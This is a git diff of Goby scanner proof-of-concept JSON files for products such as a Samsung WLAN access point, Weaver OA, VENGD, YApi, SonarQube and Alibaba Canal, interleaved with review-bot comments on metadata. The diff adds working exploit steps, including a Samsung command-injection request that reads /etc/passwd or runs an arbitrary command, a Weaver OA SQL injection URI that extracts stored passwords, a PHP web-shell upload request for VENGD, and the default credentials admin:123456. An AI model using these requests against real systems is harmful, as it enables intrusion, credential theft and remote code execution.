", - "References": [ - "Internet" + "Tags": [ + "rce" ], + "GobyQuery": "title=\"Samsung WLAN AP\" || app=\"Chunjs-server\" && body=\"Samsung Electronics\"", + "Description": "Samsung WLAN AP WEA453e", + "Product": "Samsung WLAN AP WEA453e", + "Homepage": "https://www.samsung.com/", + "Author": "", + "Impact": "Samsung WLAN AP wea453e router has a remote command execution vulnerability.", + "Recommendation": "", + "References": [], + "HasExp": true, + "ExpParams": [ + { + "Name": "Cmd", + "Type": "input", + "Value": "cat /etc/passwd" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { "Request": { - "method": "POST", + "method": "GET", "uri": "/(download)/tmp/a.txt", - "follow_redirect": true, + "follow_redirect": false, "header": { - "Connection": "close", - "Content-Length": "48" + "Content-Type": "application/json;charset=UTF-8" }, "data_type": "text", - "data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt" + "data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt", + "set_variable": [] }, "ResponseTest": { "type": "group", @@ -46,9 +58,43 @@ } ] }, - "SetVariable": [] + "SetVariable": [ + "output|lastbody|regex|" + ] } ], - "PostTime": "2021-04-01 11:47:39", - "GobyVersion": "1.8.237" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/(download)/tmp/a.txt", + "follow_redirect": false, + "header": { + "Content-Type": "application/json;charset=UTF-8" + }, + "data_type": "text", + "data": "command1=shell:{{{Cmd}}}| dd of=/tmp/a.txt", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file 
diff --git a/poc/Security_Devices_Hardcoded_Password.json b/poc/Security_Devices_Hardcoded_Password.json index f50e512..49a522c 100644 --- a/poc/Security_Devices_Hardcoded_Password.json +++ b/poc/Security_Devices_Hardcoded_Password.json @@ -5,11 +5,11 @@ "infoleak" ], "GobyQuery": "body=\"var dkey_verify = Get_Verify_Info(hex_md5)\"", - "Description": "中科网威、网域科技、锐捷、天工网络等防火墙web管理程序存在硬编码漏洞。", - "Product": "多个", - "Homepage": "无", - "Author": "aetkrad", - "Impact": "", + "Description": "", + "Product": "", + "Homepage": "", + "Author": "", + "Impact": "There are hard-coded vulnerabilities in firewall web management programs such as Zhongke Wangwei, Wangyu Technology, Ruijie, and Tiangong Network.", "Recommendation": "", "References": [ "https://mp.weixin.qq.com/s/59-rkZUWZNtJVgIbpULnxw" @@ -94,6 +94,6 @@ ] } ], - "PostTime": "2021-12-06 16:14:12", - "GobyVersion": "1.9.310" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/SonarQube_unauth_CVE_2020_27986.json b/poc/SonarQube_unauth_CVE_2020_27986.json index 53cfdc9..e736b52 100644 --- a/poc/SonarQube_unauth_CVE_2020_27986.json +++ b/poc/SonarQube_unauth_CVE_2020_27986.json @@ -4,7 +4,7 @@ "Tags": [ "unauth" ], - "GobyQuery": "app=\"SonarQube-code management\"", + "GobyQuery": "app=\"SonarQube\"", "Description": "SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI.", "Product": "SonarQube", "Homepage": "https://www.sonarqube.org/", @@ -14,7 +14,7 @@ "References": [ "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27986" ], - "HasExp": true, + "HasExp": false, "ExpParams": null, "ExpTips": { "Type": "", 
@@ -64,50 +64,6 @@ ] } ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/api/settings/values", - "follow_redirect": true, - "header": null, - "data_type": "text", - "data": "", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "sonaranalyzer-cs.nuget.packageVersion", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "sonar.core.id", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|" - ] - } - ], - "PostTime": "2022-06-25 20:10:24", - "GobyVersion": "1.9.323" + "PostTime": "2021-11-29 15:03:58", + "GobyVersion": "1.9.310" } \ No newline at end of file diff --git a/poc/VENGD_Arbitrary_File_Upload.json b/poc/VENGD_Arbitrary_File_Upload.json index 285d630..73c26a4 100644 --- a/poc/VENGD_Arbitrary_File_Upload.json +++ b/poc/VENGD_Arbitrary_File_Upload.json @@ -5,11 +5,11 @@ "getshell" ], "GobyQuery": "title=\"和信下一代云桌面VENGD\"", - "Description": "和信创天云桌面系统存在任意文件上传", + "Description": "VENGD", "Product": "VENGD", "Homepage": "https://www.vesystem.com/products/3", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "VENGD Arbitrary File Upload", "Recommendation": "", "References": [ "https://blog.csdn.net/weixin_44146996/article/details/115611026" 
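Review bot: `PostTime` moves backwards in this hunk, from `2022-06-25 20:10:24` to `2021-11-29 15:03:58`, and `GobyVersion` from `1.9.323` to `1.9.310`, which suggests the sync overwrote a newer revision of the SonarQube entry with an older copy. The earlier hunks in the same file (`GobyQuery` and `HasExp`) would then be reverts rather than fixes. If that is not intended, the import should compare `PostTime` and keep the newer file; if it is, the commit message should say why the later revision was dropped.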
@@ -37,7 +37,7 @@ "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv" }, "data_type": "text", - "data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n\n------WebKitFormBoundaryfcKRltGv--", + "data": "------WebKitFormBoundaryfcKRltGv\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\r\nContent-Type: image/avif\r\n\r\n\r\n------WebKitFormBoundaryfcKRltGv--", "set_variable": [ "str1|rand|str|7", "r1|rand|int|8" @@ -106,7 +106,7 @@ "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv" }, "data_type": "text", - "data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n{{{FileContent}}}\n------WebKitFormBoundaryfcKRltGv--", + "data": "------WebKitFormBoundaryfcKRltGv\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\r\nContent-Type: image/avif\r\n\r\n{{{FileContent}}}\r\n------WebKitFormBoundaryfcKRltGv--", "set_variable": [ "r1|rand|int|8" ] @@ -156,6 +156,6 @@ ] } ], - "PostTime": "2021-12-09 13:55:04", - "GobyVersion": "1.9.310" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json b/poc/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json index ac72523..6ae21fe 100644 --- a/poc/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json +++ b/poc/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json 
@@ -4,16 +4,23 @@ "Tags": [ "SSRF" ], - "GobyQuery": "app=\"Apache-Web-Server\" && title==\"vRealize Operations Manager\"", - "Description": "malicious attackers who access the vrealize Operations Manager API through the network can perform server-side request forgery attack to steal management credentials.", + "GobyQuery": "app=\"Apache-Web-Server\" && title=\"vRealize Operations Manager\"", + "Description": "vRealize Operations Enable self-driving IT Operations Management across private, hybrid and multi-cloud environments with a unified operations platform that delivers continuous performance, capacity and cost optimization, intelligent remediation and integrated compliance through AI/ML and predictive analytics.", "Product": "VMWare Operations vRealize Operations", - "Homepage": "https://www.vmware.com/cn/products/vrealize-operations.html", - "Author": "PeiQi", - "Impact": " can perform server-side request forgery attack to steal management credentials.
undefined
", + "Homepage": "https://www.vmware.com/products/vrealize-operations.html", + "Author": "", + "Impact": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.", + "Recommendation": "", "References": [ - "http://wiki.peiqi.tech" + "https://nvd.nist.gov/vuln/detail/CVE-2021-21975", + "https://www.vmware.com/security/advisories/VMSA-2021-0004.html" ], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -64,7 +71,7 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { @@ -111,11 +118,9 @@ } ] }, - "SetVariable": [ - "output|lastbody" - ] + "SetVariable": [] } ], - "PostTime": "2021-04-07 23:45:28", - "GobyVersion": "1.8.255" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json b/poc/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json index 670e4b2..d106efe 100644 --- a/poc/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json +++ b/poc/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json @@ -8,7 +8,7 @@ "Description": "VMware vCenter Server is advanced server management software that provides a centralized platform for controlling your VMware vSphere environments, allowing you to automate and deliver a virtual infrastructure across the hybrid cloud with confidence.", "Product": "VMware-vCenter", "Homepage": "https://www.vmware.com/products/vcenter-server.html", - "Author": "aetkrad", + "Author": "", "Impact": "", "Recommendation": "", "References": [ @@ -100,6 +100,6 @@ ] } ], - "PostTime": "2021-12-02 18:50:55", - "GobyVersion": "1.9.310" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file 
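Review bot: `"Recommendation": ""` is left empty in the `@@ -4,16 +4,23 @@` hunk although the same hunk adds the vendor advisory to `References` and the new `Impact` names the affected range (prior to 8.4). I would fill it, e.g. `"Recommendation": "Apply the fixed release or workaround described in VMSA-2021-0004."` The query also changes from `title==` to `title=`; if `==` is the exact-match form, as its use in other entries of this diff suggests, this widens the asset match and may attach the finding to unrelated hosts.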
diff --git a/poc/Weaver_OA_8_SQL_injection.json b/poc/Weaver_OA_8_SQL_injection.json index b523bde..e59fe29 100644 --- a/poc/Weaver_OA_8_SQL_injection.json +++ b/poc/Weaver_OA_8_SQL_injection.json @@ -5,15 +5,19 @@ "SQL Injection" ], "GobyQuery": "app=\"Weaver-OA\"", - "Description": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges", + "Description": "", "Product": "Weaver OA 8", - "Homepage": "https://www.weaver.com.cn/", - "Author": "PeiQi", - "Impact": "", - "Recommandation": "undefined
", - "References": [ - "http://wiki.peiqi.tech" - ], + "Homepage": "https://weaver.com/", + "Author": "", + "Impact": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges.", + "Recommendation": "", + "References": [], + "HasExp": false, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -21,7 +25,7 @@ "method": "GET", "uri": "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager", "follow_redirect": false, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -47,7 +51,7 @@ "type": "item", "variable": "$body", "operation": "not contains", - "value": "", + "value": "<html>", "bz": "" }, { @@ -62,6 +66,6 @@ "SetVariable": [] } ], - "PostTime": "2021-04-10 08:00:20", - "GobyVersion": "1.8.255" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/YAPI_RCE.json b/poc/YAPI_RCE.json index b796f28..f72040a 100644 --- a/poc/YAPI_RCE.json +++ b/poc/YAPI_RCE.json 
@@ -4,17 +4,20 @@ "Tags": [ "rce" ], - "GobyQuery": "(app=\"YAPI\" | title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" | title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\")", - "Description": "YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI发布在公网且开发注册,会导致攻击者注册后执行任意命令。", + "GobyQuery": "app=\"YAPI\" || title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" || title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\"", + "Description": "YApi is an efficient, easy-to-use and powerful visual interface management platform.", "Product": "YAPI", "Homepage": "https://github.com/YMFE/yapi", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code.", "Recommendation": "", "References": [ + "https://www.secpulse.com/archives/162502.html", + "https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b", + "https://twitter.com/sec715/status/1415484190561161216", "https://mp.weixin.qq.com/s/zobag3-fIl_0vrc8BrnRjg" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -64,6 +67,43 @@ ] } ], - "PostTime": "2021-12-01 20:34:40", - "GobyVersion": "1.9.310" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/alibaba_canal_default_password.json b/poc/alibaba_canal_default_password.json index bd3b0b6..ee40781 100644 
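Review bot: The new `Impact` text says "remote unauthenticated attackers", but the description removed by this hunk gave a different precondition: the instance is exposed publicly with registration open, and the attacker registers before running commands. Dropping that precondition also drops the most direct mitigation, and `"Recommendation": ""` stays empty. I would restore the precondition in `Impact` and fill the remediation, e.g. `"Recommendation": "Disable open user registration and do not expose YApi directly to the internet."`.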
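Review bot: The `ExploitSteps` block added in the `@@ -64,6 +67,43 @@` hunk looks like an unedited template. It requests `/test.php`, matches a body containing `test`, and ends with an empty pattern in `"output|lastbody|regex|"`, none of which relates to YApi. Together with `"HasExp": true` in the first hunk of this file, the entry now advertises a verification step that would return unrelated or empty output and mislead whoever triages the finding. Until a reviewed step exists, keep `"HasExp": false` and leave the block out.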
--- a/poc/alibaba_canal_default_password.json +++ b/poc/alibaba_canal_default_password.json @@ -1,18 +1,20 @@ { - "Name": "alibaba canal default password", - "Level": "3", + "Name": "Alibaba Canal Default Password", + "Level": "2", "Tags": [ "defaultaccount" ], - "GobyQuery": "(title=\"Canal Admin\"|body=\"Canal Admin Login\")", - "Description": "alibaba canal has a default password problem. Attackers can log in through admin:123456", - "Product": "Remote attacker can use this default to control the system", + "GobyQuery": "title=\"Canal Admin\" || body=\"Canal Admin Login\"", + "Description": "Alibaba Canal is Incremental log parsing based on MySQL database, providing incremental data subscription and consumption.", + "Product": "Alibaba Canal", "Homepage": "https://github.com/alibaba/canal", - "Author": "aetkrad", - "Impact": "", - "Recommendation": "", - "References": [], - "HasExp": false, + "Author": "", + "Impact": "Alibaba Canal has a default password vulnerability, an attacker can use the administrator account admin:123456 login.", + "Recommendation": "Modify Alibaba Canal administrator's default password.", + "References": [ + "https://github.com/alibaba/canal/wiki/ClientAdapter" + ], + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -128,6 +130,6 @@ ] } ], - "PostTime": "2021-10-31 17:23:05", - "GobyVersion": "1.8.302" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/fahuo100_sql_injection_CNVD_2021_30193.json b/poc/fahuo100_sql_injection_CNVD_2021_30193.json index cd9bc54..a5b837e 100644 --- a/poc/fahuo100_sql_injection_CNVD_2021_30193.json +++ b/poc/fahuo100_sql_injection_CNVD_2021_30193.json 
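Review bot: `"Level"` drops from `"3"` to `"2"` in the same `@@ -1,18 +1,20 @@` hunk that describes an administrator login with `admin:123456` and sets `"HasExp": true`, and nothing in the commit explains the lower rating. The Fahuo100 entry gets the same unexplained change. If the lower level is intended, the commit message should say why; otherwise keep `"Level": "3"`. The new `Recommendation` is a useful addition but could also cover exposure: `"Recommendation": "Change the default administrator password at deployment and restrict the Canal Admin console to trusted networks."`. The steps that `HasExp` refers to are outside this hunk.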
@@ -1,19 +1,25 @@ { - "Name": "fahuo100_sql_injection_CNVD_2021_30193", - "Level": "3", + "Name": "Fahuo100 SQL Injection CNVD-2021-30193", + "Level": "2", "Tags": [ "SQL Injection" ], "GobyQuery": "header=\"Cache-Control: no-store, no-cache\"", - "Description": "发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息", - "Product": "发货100", + "Description": "Fahuo100 virtual goods automatic delivery system is a powerful virtual goods automatic delivery system/article paid reading system.", + "Product": "Fahuo100", "Homepage": "https://www.fahuo100.cn/", - "Author": "gobysec@gmail.com", - "Impact": "", - "Recommandation": "undefined
", + "Author": "", + "Impact": "Fahuo100 M_id SQL Injection", + "Recommendation": "", "References": [ - "https://gobies.org/" + "https://www.cnvd.org.cn/flaw/show/CNVD-2021-30193" ], + "HasExp": false, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -21,7 +27,7 @@ "method": "GET", "uri": "/?M_id=1'&type=product", "follow_redirect": true, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -48,6 +54,6 @@ "SetVariable": [] } ], - "PostTime": "2021-06-03 22:27:28", - "GobyVersion": "1.8.268" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file
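Review bot: The unchanged fingerprint `"GobyQuery": "header=\"Cache-Control: no-store, no-cache\""` in the `@@ -1,19 +1,25 @@` hunk matches a very common response header rather than anything specific to Fahuo100, so this rule will probe, and may flag, unrelated hosts. The metadata rewrite around it was the natural place to add a product-specific title or body marker. The new `Impact` is only a title and no longer says what the removed description did, namely that sensitive database contents can be obtained through `M_id`, and `Recommendation` is empty. Suggested: `"Impact": "SQL injection in the M_id parameter lets an attacker read sensitive database contents."`, plus a remediation line pointing to the vendor fix and to parameterized queries.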